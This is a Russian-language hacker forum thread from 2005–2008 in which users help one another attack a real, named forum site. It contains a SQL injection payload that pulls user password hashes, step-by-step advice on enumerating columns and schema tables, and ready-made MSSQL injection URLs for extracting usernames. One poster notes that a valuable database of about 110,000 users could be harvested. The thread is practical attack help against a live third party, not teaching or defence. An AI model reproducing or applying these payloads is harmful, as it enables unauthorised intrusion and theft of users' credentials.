Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.05.2005, 17:26
|
|
Новичок
Регистрация: 17.05.2005
Сообщений: 6
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от OLIVER
Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )
Да точно самый простой способ... 
Спасибо всем, а особенно To Green_bear и Grrl !!!
Давно хотел попробовать и научиться методу подмены кукисов, и вот получилось...
|
|
|
13.06.2008, 23:35
|
|
Новичок
Регистрация: 16.02.2008
Сообщений: 5
Провел на форуме:
114509
Репутация:
2
|
|
Товарищи, сделал всё как в видео на сайте
http://forum.bcs.ru/index.php
ошибку выдаёт
Could not obtain search results
DEBUG MODE
SQL Error : Missing end comment mark '*/'.
SELECT search_array FROM bb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52,58,34,115 ,101,97,114,99,104,95,114,101,115,117,108,116,115, 34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34, 116,111,116,97,108,95,109,97,116,99,104,95,99,111, 117,110,116,34,59,105,58,53,59,115,58,49,50,58,34, 115,112,108,105,116,95,115,101,97,114,99,104,34,59 ,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34), user_password,char(34,59,125,115,58,55,58,34,115,1 11,114,116,95,98,121,34,59,105,58,48,59,115,58,56, 58,34,115,111,114,116,95,100,105,114,34,59,115,58, 52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115, 104,111,119,95,114,101,115,117,108,116,115,34,59,1 15,58,54,58,34,116,111,112,105,99,115,34,59,115,58 ,49,50,58,34,114,101,116,117,114,110,95,99,104,97, 114,115,34,59,105,58,50,48,48,59,125)) FROM phpbb_users WHERE user_id=1/* AND session_id = '[x][x][x][x][x][x]'
Line : 694
File : c:\inetpub\wwwroot\phpbb2\search.php
а дальше не совсем понимаю что делать... объясните пожалуйста. Оч нужно... |
|
|
|
06.07.2008, 15:47
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
1 Удаляеешь все сплойты и видео с компа.
2 Читаем статьи про sql injection
http://forum.antichat.ru/threadnav43966-1-10.html
3 подбираем колонки в ручную, подставляя null, пока не пропадет ошибка.
4 смотришь INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
http://starcat.dp.ua/doc/mysql-5.1/information-schema.html#schemata-table
5 если не помогло, хотя должно пробуй highlight
Последний раз редактировалось am@tory; 06.07.2008 в 16:01..
|
|
|
|
06.07.2008, 16:36
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
am@tory,
3. омг. order by и group by в помощь, и можно и циферки подставлять. Почитай статьи и маны по sql.
4. эти таблицы только в 5 ветке mysql
=\
|
|
|
|
06.07.2008, 16:43
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
1. там mssql => легче подзапросы... имхо.. 
http://forum.bcs.ru/search.php?search_id=564+or+1=@@version--
2.
http://forum.bcs.ru/search.php?search_id=564+or+1=(select+top+1+userna me+from+bb_users)--
колонку с паролями не помню... сам ищи...
p.s:
Не думал что на таком сайте, может такое старье стоять...
Хорошую(дорогую) базу собрать можно...
Всего зарегистрированных пользователей: 109988
Последний раз редактировалось aka PSIH; 06.07.2008 в 16:47..
|
|
|
|
06.07.2008, 17:23
|
|
Познающий
Регистрация: 08.01.2007
Сообщений: 59
Провел на форуме:
152485
Репутация:
44
|
|
Сообщение от n0ne
am@tory,
3. омг. order by и group by в помощь, и можно и циферки подставлять. Почитай статьи и маны по sql.
4. эти таблицы только в 5 ветке mysql
=\
3 ofmg. order by у меня на 2.0.6 не работал.
уж поверь я эти статьи до дыр затер
4 для этого можно написать version()
8-)
Последний раз редактировалось am@tory; 06.07.2008 в 18:01..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
